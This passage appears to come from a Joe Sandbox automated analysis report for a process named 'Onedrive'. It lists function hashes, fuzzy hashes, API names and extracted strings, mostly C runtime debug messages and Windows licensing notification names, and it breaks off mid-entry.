                                        • Opcode ID: e17c61074ea742d8d2e34edeb5ed5bb4e075f1e8e48f4a5c1d6400f9c735111e
                                        • Instruction ID: 7ad6bfdc27aff673287409c59271989085bb7fb2640dcb353d1f703a4abbe5f1
                                        • Opcode Fuzzy Hash: e17c61074ea742d8d2e34edeb5ed5bb4e075f1e8e48f4a5c1d6400f9c735111e
                                        • Instruction Fuzzy Hash: E3D06229D1AE4396D6046B61E8590292260FB99B82F91D435DA4F19724DE3DD4598600
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $($6$BM
                                        • API String ID: 0-1480521668
                                        • Opcode ID: 2d8c12331ff5a7f698b7a0f75df302dc6d3f24d3f217a5fd4b89385f2d6db3ab
                                        • Instruction ID: 91c38b8585092a5c22bfa9ef6fdbb2c103cf66f519c583b3c6d3f011139fb0f3
                                        • Opcode Fuzzy Hash: 2d8c12331ff5a7f698b7a0f75df302dc6d3f24d3f217a5fd4b89385f2d6db3ab
                                        • Instruction Fuzzy Hash: D0A18470208B488FEB64EF28D459BAAB7E1FBD9701F010569E589C7350DF74D841CB82
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %ls$("Division by zero", false)$minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h
                                        • API String ID: 0-226933
                                        • Opcode ID: b6acd8fb6b2147fab697d2cf9cd18a8739495131df0abd8c48eb14d6879e420b
                                        • Instruction ID: 6284864ff7f0e2c79f35c60ffb39af3d049e1536c0799a13e3b9d96deb223d60
                                        • Opcode Fuzzy Hash: b6acd8fb6b2147fab697d2cf9cd18a8739495131df0abd8c48eb14d6879e420b
                                        • Instruction Fuzzy Hash: 5352A776609A818FD7A4CF19E49076AB7A1F7C8784F108129E69EC7B58DB3DE845CF00
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcessmemmove
                                        • String ID:
                                        • API String ID: 459441494-0
                                        • Opcode ID: a27ebb562d8cc982a7662c2533a1bef2f07e9f90c8f62cd5c03b61370cd8a582
                                        • Instruction ID: affee780ef41fda2b209cb331fd53c4ca93fb6873b96104e9837ae774927065d
                                        • Opcode Fuzzy Hash: a27ebb562d8cc982a7662c2533a1bef2f07e9f90c8f62cd5c03b61370cd8a582
                                        • Instruction Fuzzy Hash: 8541B432A08E46E2EE24AB69548007D7659BF84FB4F554135DF1DC7391DE3DE525C380
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,00007FF8A032D827), ref: 00007FF8A032D663
                                        • Concurrency::details::UMSBackgroundPoller::~UMSBackgroundPoller.LIBCMTD ref: 00007FF8A032D698
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Background$Concurrency::details::DebuggerPollerPoller::~Present
                                        • String ID:
                                        • API String ID: 4075439979-0
                                        • Opcode ID: fba7e88bfb5c1bbf52a23c72e8edeb339766ede9cbd48fef0c18e119376efd8f
                                        • Instruction ID: 3526330d32645c809b4742227a8c42883ce96bf9522dac659612f7aa842b2abf
                                        • Opcode Fuzzy Hash: fba7e88bfb5c1bbf52a23c72e8edeb339766ede9cbd48fef0c18e119376efd8f
                                        • Instruction Fuzzy Hash: 0B31646150DBC395E7319B65A00077FBBA0EBA8388F440135F2CD85B8ADE6CD644DF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 04e19abc072cb432b3cdb3008cafd2c004a1f03d8c376199b394da96084127c1
                                        • Instruction ID: 86fec364868e1015b9f9913587373c049a9ac1fe7da3057e7dcc5a4dab079fb8
                                        • Opcode Fuzzy Hash: 04e19abc072cb432b3cdb3008cafd2c004a1f03d8c376199b394da96084127c1
                                        • Instruction Fuzzy Hash: D1F10D703149088FEB4DFB19E499BA637F2FB98701F5045B8E589C7296DB34E841CB42
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: InfoSystem
                                        • String ID:
                                        • API String ID: 31276548-0
                                        • Opcode ID: b91bee5e328decbd5a4a70b1843fdfc0294844994040808bef8b895f383804b0
                                        • Instruction ID: ebe03a7cdc663cd511be06a6663660e52537b36105bc210665a8e501d19a9633
                                        • Opcode Fuzzy Hash: b91bee5e328decbd5a4a70b1843fdfc0294844994040808bef8b895f383804b0
                                        • Instruction Fuzzy Hash: 0331E62661EE859ADAA0CB15E48036AB7A0FB8D785F505135EACE83B68DF3CD1549F00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: 93246ffeeb1bb3ddc22196d4ce7f8a2fa6ee99dbb0283524e9d2c137badd3ae2
                                        • Instruction ID: 855d74f7074aa2e919d5b30e1d5f4f1048db8e5ea209e276121b2186cfc3faad
                                        • Opcode Fuzzy Hash: 93246ffeeb1bb3ddc22196d4ce7f8a2fa6ee99dbb0283524e9d2c137badd3ae2
                                        • Instruction Fuzzy Hash: 79D11E72A1AA42ABE794CF28E442329B7E0F788394F145536E69DD77E4DB7CE4448F00
                                        APIs
                                        • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6104FEBDB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: ba2b6f105ae3816e086ea7a8ddb470942bd15c703735edc8651067e593597a60
                                        • Instruction ID: 7e28885478110239f21a65c41c7a048f3fc59d28a664755f5a2cf67f74106ce8
                                        • Opcode Fuzzy Hash: ba2b6f105ae3816e086ea7a8ddb470942bd15c703735edc8651067e593597a60
                                        • Instruction Fuzzy Hash: FBB09214F2A802E1DA04AB229D9506922A17B58B25FC00830C10EC0620DE1CA1AA8700
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: cAAFvCF*&
                                        • API String ID: 0-870564915
                                        • Opcode ID: 4bb7de6d471c858b184386500e942d622e63483a6994dd825a79aa6e95874214
                                        • Instruction ID: 581464832cd6e96e83d647c8702d1abcb8f5d2a4b26c9e320a477a9e93933436
                                        • Opcode Fuzzy Hash: 4bb7de6d471c858b184386500e942d622e63483a6994dd825a79aa6e95874214
                                        • Instruction Fuzzy Hash: E5719E36716A029BDB488F69E96167937A1F784780F54923AEB8E93390DF3CE845C740
                                        Memory Dump Source
                                        • Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80c036b92ef97acd21fe0ddbe3dc026513253f78371ca749ad679c4476b99894
                                        • Instruction ID: ae179e8f6d7e78c3ad0cd19834c8ae0005cb8ee7d2ef2d96267a85678ec7d14a
                                        • Opcode Fuzzy Hash: 80c036b92ef97acd21fe0ddbe3dc026513253f78371ca749ad679c4476b99894
                                        • Instruction Fuzzy Hash: D2621F70218B488FDB99EF18D488B96B7E1FBA8301F5145ADE58DD7361CB30E945CB42
                                        Memory Dump Source
                                        • Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb9f7026369abc2f533983e64922662aaf186562180a13f1a63ba32285e1e16d
                                        • Instruction ID: 7571c4111361fb1e259845a255aec5636026ffddfc6e9cca4cc9116cbea8b4e3
                                        • Opcode Fuzzy Hash: eb9f7026369abc2f533983e64922662aaf186562180a13f1a63ba32285e1e16d
                                        • Instruction Fuzzy Hash: 2F127270218A088FEB9DEB1CE458BA677F2FBA8701F1405B9D54DC7291CB74E845CB82
                                        Memory Dump Source
                                        • Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f703cd1896e92a8ea5974dddae7fbdbbbeff298064ce552387292163702aa10e
                                        • Instruction ID: 2b001d1b4702511d3f134c2723939fd3c0521e6afd4864832777aa0f744a6162
                                        • Opcode Fuzzy Hash: f703cd1896e92a8ea5974dddae7fbdbbbeff298064ce552387292163702aa10e
                                        • Instruction Fuzzy Hash: 4161152512D6C54AD74E9A3858562FAFFE1DBE7605F88AAFDF4C7C3283D81094468383
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e48766748434b3bff571e46740c1065f90807cda6717c7d4accfc1540458af72
                                        • Instruction ID: c0ef1bc385010c0e6409d0e5d50f82895e8e0fab1137a53d08a5a692c9fda73a
                                        • Opcode Fuzzy Hash: e48766748434b3bff571e46740c1065f90807cda6717c7d4accfc1540458af72
                                        • Instruction Fuzzy Hash: 3B11257261AB429FEB54CF19E85132677A0FB48384F508439D98D87764DB3CE040CF05
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: _invoke_watson_if_error$_aligned_msize$__vcrt_lock$FileWrite_wcsftime_l
                                        • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$minkernel\crts\ucrt\src\appcrt\misc\dbgrptt.cpp$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szOutMessage, 4096, szLineMessage)$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
                                        • API String ID: 2594007075-2011695164
                                        • Opcode ID: d03ea63f399c27827eb7d501663fc5a132353fde7f3ec8e3284bc11393ad2cfd
                                        • Instruction ID: f255f427de8a88ace3a07c60efd650808280215ed71ae3d719b5357345f0a692
                                        • Opcode Fuzzy Hash: d03ea63f399c27827eb7d501663fc5a132353fde7f3ec8e3284bc11393ad2cfd
                                        • Instruction Fuzzy Hash: 2642F83291AF87A6EB20CB14E4553EA73A0FB88385F500136D68D4BBA9DF7DE545CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: Cleanup$EvalNotify$GenericUnlicensed$IAActivationFailure$KernelExpiration$LastNotificationId$NeverActivated$NoProductKey$OEMCOAActivationFailure$OEMSLPActivationFailure$ReActivateRequired$RebootRequired$RepairRequired$TBLExpiring$TamperDetected$TimebasedExpired$VolumeBindingKMSNonSLP$VolumeBindingServiceNCount$VolumeRenewalRequired$VolumeUnlicensed
                                        • API String ID: 2081463915-1899693706
                                        • Opcode ID: de06abb46b7cc62a64efd2d5727dee8ebc6370a735e4bf0ffcbeb2d7c1986c94
                                        • Instruction ID: 638b39c5118f317a6863e2d5ac36f255cb327706b33e920f797d4495834834fe
                                        • Opcode Fuzzy Hash: de06abb46b7cc62a64efd2d5727dee8ebc6370a735e4bf0ffcbeb2d7c1986c94
                                        • Instruction Fuzzy Hash: 48911661A0CE0AE6FF248F15A68027C7AA5BB49FE8F518135C90EC6358DF7CE419C709
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_$CriticalLock::_ReentrantScoped_lockScoped_lock::~_$ComputeMallocaSchedulerScheduler::_Size$AllocaByteCharMarkMultiWide__crt_scoped_stack_ptr_freea_crtnew[]
                                        • String ID: minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp
                                        • API String ID: 2182855091-1038314930
                                        • Opcode ID: 4e5b80094f0f0fa01d2bbae1c9aa3c99a7f2f13ad5c29e15660c30839939a95b
                                        • Instruction ID: 94f6a93aab7a47628f9d9bf9c83a8ee27ccfaab5b027a8d17a068f05c2ae9a62
                                        • Opcode Fuzzy Hash: 4e5b80094f0f0fa01d2bbae1c9aa3c99a7f2f13ad5c29e15660c30839939a95b
                                        • Instruction Fuzzy Hash: 52F1E83290EA8296E760DB54E0857ABB7A0FB84394F400139E6CD87B99DFBCE545CF41
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: _aligned_msize_invoke_watson_if_error$_controlfp_sfegetenv
                                        • String ID: $1#IND$1#INF$1#QNAN$1#SNAN$__acrt_fltout$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$strcpy_s(result, result_count, "0")$strcpy_s(result, result_count, "1#IND" )$strcpy_s(result, result_count, "1#INF" )$strcpy_s(result, result_count, "1#QNAN")$strcpy_s(result, result_count, "1#SNAN")
                                        • API String ID: 436164602-1152488507
                                        • Opcode ID: b18c9ca64db226cc6873a84e4e06ebe99eb580fab364faa48c7c8acdb43524ed
                                        • Instruction ID: 87926c651cb27f1773d35b3ad260e09bbf003d91f0d883b6df0e9de66346264d
                                        • Opcode Fuzzy Hash: b18c9ca64db226cc6873a84e4e06ebe99eb580fab364faa48c7c8acdb43524ed
                                        • Instruction Fuzzy Hash: 4EA12D72A0EB82A5EB60DB15E4903AAB7A0FB843C4F405136E6DD477A9CF3DE544CB41
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_CriticalHandleLock::_ModuleReentrantScoped_lockScoped_lock::~__invoke_watson_if_error
                                        • String ID: File: $Line: $Module: $(*_errno())$...$@$@$Expression: $Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
                                        • API String ID: 2724354428-1800103407
                                        • Opcode ID: 8adce8b2c13583390307289f89d3710f9b076da8aee81252e0d5781860522c7d
                                        • Instruction ID: 1553598b7f9b47f8f259635c12e75104a3de8aafbce0b83278f31e3995baa23e
                                        • Opcode Fuzzy Hash: 8adce8b2c13583390307289f89d3710f9b076da8aee81252e0d5781860522c7d
                                        • Instruction Fuzzy Hash: 0A02E13660EFC6A4EA708B14F4543AAB3A4FB88785F504536DA8D47BA8DF7DD194CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_CriticalHandleLock::_ModuleReentrantScoped_lockScoped_lock::~__invoke_watson_if_error
                                        • String ID: File: $Line: $Module: $(*_errno())$...$@$@$Expression: $Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
                                        • API String ID: 2724354428-1800103407
                                        • Opcode ID: 36cc416a54f125e35fa876ca446d39aa3a249108b265d09d6c5bebbafa260ccb
                                        • Instruction ID: b9f7b1aed5dee46afa13ebdc76d30e36ac7c2ab6e6d9dbafc6f9d3463c543279
                                        • Opcode Fuzzy Hash: 36cc416a54f125e35fa876ca446d39aa3a249108b265d09d6c5bebbafa260ccb
                                        • Instruction Fuzzy Hash: 3602D23660EFC6A5EA709B14E4943EAB3A4FB88385F504536D68D47BA8DF7DD184CB00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $__acrt_report_runtime_error$minkernel\crts\ucrt\src\appcrt\internal\report_runtime_error.cpp$wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"\n\n")$wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), message)$wcscpy_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)
                                        • API String ID: 0-4242594854
                                        • Opcode ID: bc5a43f3c3d65df8e7de82fba6ef7f3b101c2779c10b4b0d15b9a4aa5b4cf862
                                        • Instruction ID: af63213aa47e05d04b7e63873ef49fd3356869a24561738e8409e5cf5c45b948
                                        • Opcode Fuzzy Hash: bc5a43f3c3d65df8e7de82fba6ef7f3b101c2779c10b4b0d15b9a4aa5b4cf862
                                        • Instruction Fuzzy Hash: 5A514C61A1EF47A6EB10DB55E8507BA6360FB887C5F801036E98E4B7A5DF3DE248C740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
